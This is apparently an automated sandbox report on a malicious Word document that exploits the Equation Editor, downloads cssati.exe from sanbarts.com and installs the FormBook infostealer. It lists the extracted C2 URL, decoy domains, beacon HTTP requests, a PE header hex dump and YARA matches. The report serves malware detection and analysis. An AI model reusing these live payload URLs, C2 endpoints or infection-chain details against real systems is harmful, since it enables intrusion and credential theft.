Windows Analysis Report
Revised RFQ-PO180911.doc

AV Detection

Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Source: Revised RFQ-PO180911.doc	Virustotal: Detection: 31%			Perma Link
Source: Revised RFQ-PO180911.doc	ReversingLabs: Detection: 32%

Source: Yara match	File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: http://sanbarts.com/cssati.exe	Avira URL Cloud: Label: malware
Source: http://www.sanbarts.com/cssati.exe	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp

Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe	ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\word.exe	ReversingLabs: Detection: 61%

Source: 6.0.dvukljmnr.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.dvukljmnr.exe.160000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.dvukljmnr.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.dvukljmnr.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.dvukljmnr.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 194.9.94.86 Port: 80			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 45.120.185.113 Port: 80			Jump to behavior

Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr

Stream path '_1715191568/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
Source:	Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp

Spreading

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_00405426
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,		4_2_00405D9C
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_004026A1 FindFirstFileA,		4_2_004026A1

Software Vulnerabilities

Source: global traffic

DNS query: name: sanbarts.com

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80

Networking

Source: C:\Windows\explorer.exe	Domain query: www.paypal-caseid521.com
Source: C:\Windows\explorer.exe	Network Connect: 98.137.244.37 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.storyofsol.com
Source: C:\Windows\explorer.exe	Domain query: www.createacarepack.com

Source: Malware configuration extractor

URLs: www.rthearts.com/nk6l/

Source: Joe Sandbox View	ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View	ASN Name: YAHOO-GQ1US YAHOO-GQ1US

Source: global traffic

HTTP traffic detected: GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1Host: www.createacarepack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 194.9.94.86 194.9.94.86

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 26 May 2022 00:40:19 GMTAccept-Ranges: bytesETag: "4042e42c9970d81:0"Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 27 May 2022 19:20:07 GMTContent-Length: 299113Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 71 4a a8 a1 10 24 fb a1 10 24 fb a1 10 24 fb 2f 18 7b fb a3 10 24 fb a1 10 25 fb 3b 10 24 fb 22 18 79 fb b0 10 24 fb f5 33 14 fb a8 10 24 fb 66 16 22 fb a0 10 24 fb 52 69 63 68 a1 10 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b6 ce 69 46 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 fa 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7a 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sanbarts.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.sanbarts.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 19:21:49 GMTP3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"Vary: Accept-EncodingContent-Length: 73Content-Type: text/html; charset=iso-8859-1Age: 0Connection: closeServer: ATSData Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found

Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EQNEDT32.EXE, 00000002.00000002.915025383.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sanbarts.com/33
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914970619.00000000008F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sanbarts.com/cssati.exe
Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sanbarts.com/cssati.exej
Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.967364013.0000000006450000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.971345322.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 00000007.00000000.958260640.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.958544011.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.963238551.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.939397773.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 00000007.00000000.1025977451.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.953687008.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.965173113.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.941729011.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sanbarts.com/Couri
Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sanbarts.com/YR$
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sanbarts.com/cssati.exe
Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sanbarts.com/cssati.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sanbarts.com/cssati.exekkC:
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: wuapp.exe, 00000008.00000002.1182990879.000000000293F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6C29C56C-3D5B-4878-9A01-77B8177CDD57}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: sanbarts.com

Source: global traffic	HTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sanbarts.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.sanbarts.com
Source: global traffic	HTTP traffic detected: GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1Host: www.createacarepack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_00404FDD

E-Banking Fraud

Source: Yara match	File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: initial sample

Static file information: Filename: Revised RFQ-PO180911.doc

Source: Revised RFQ-PO180911.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
